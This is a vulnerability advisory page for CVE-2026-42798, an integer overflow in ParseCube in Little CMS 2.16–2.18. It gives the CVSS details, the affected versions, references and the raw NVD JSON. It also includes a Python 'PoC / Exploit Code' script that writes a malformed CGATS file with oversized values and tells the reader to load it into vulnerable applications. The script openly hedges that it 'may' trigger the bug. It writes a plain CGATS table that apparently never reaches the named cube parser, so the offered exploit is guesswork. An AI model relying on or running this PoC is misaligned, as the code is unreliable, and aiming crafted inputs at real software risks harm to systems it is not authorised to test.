CVE-2026-42798

Description

Little CMS (lcms2) 2.16 through 2.18 before 2.19 has an integer overflow in ParseCube in cmscgats.c.

CVSS Details

CVSS Score

4.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Little CMS (lcms2) 2.16

Little CMS (lcms2) 2.17

Little CMS (lcms2) 2.18

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import struct

# PoC for CVE-2026-42798: Integer Overflow in Little CMS ParseCube
# This script generates a malformed CGATS file that may trigger the integer overflow.

def generate_malformed_cgats(filename):
    header = b"CTI1\n"
    # Attempt to trigger large dimension parsing
    # The exact trigger depends on the vulnerable code path in ParseCube
    data = header
    data += b"NUMBER_OF_FIELDS 3\n"
    data += b"BEGIN_DATA_FORMAT\n"
    data += b"SAMPLE_ID SAMPLE_R SAMPLE_G\n"
    data += b"END_DATA_FORMAT\n"
    data += b"NUMBER_OF_SETS 1\n"
    data += b"BEGIN_DATA\n"
    # Using large values that might cause overflow in size calculations
    data += b"1 4294967295 4294967295\n"
    data += b"END_DATA\n"

    with open(filename, 'wb') as f:
        f.write(data)

    print(f"[+] Malformed CGATS file generated: {filename}")
    print("[+] Load this file with a vulnerable application using lcms2 to test.")

if __name__ == "__main__":
    generate_malformed_cgats("poc_cve_2026_42798.txt")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42798
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42798
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42798/
[4] VulDB https://vuldb.com/cve/CVE-2026-42798
[5] https://github.com/mm2/Little-CMS/commit/6a686019825a89b715d16671f18d049523354176
[6] https://github.com/mm2/Little-CMS/compare/lcms2.18...lcms2.19
[7] https://www.openwall.com/lists/oss-security/2026/04/30/8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42798", "sourceIdentifier": "[email protected]", "published": "2026-04-30T07:16:37.423", "lastModified": "2026-04-30T15:48:04.627", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Little CMS (lcms2) 2.16 through 2.18 before 2.19 has an integer overflow in ParseCube in cmscgats.c."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:L", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.4, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "references": [{"url": "https://github.com/mm2/Little-CMS/commit/6a686019825a89b715d16671f18d049523354176", "source": "[email protected]"}, {"url": "https://github.com/mm2/Little-CMS/compare/lcms2.18...lcms2.19", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/04/30/8", "source": "[email protected]"}]}}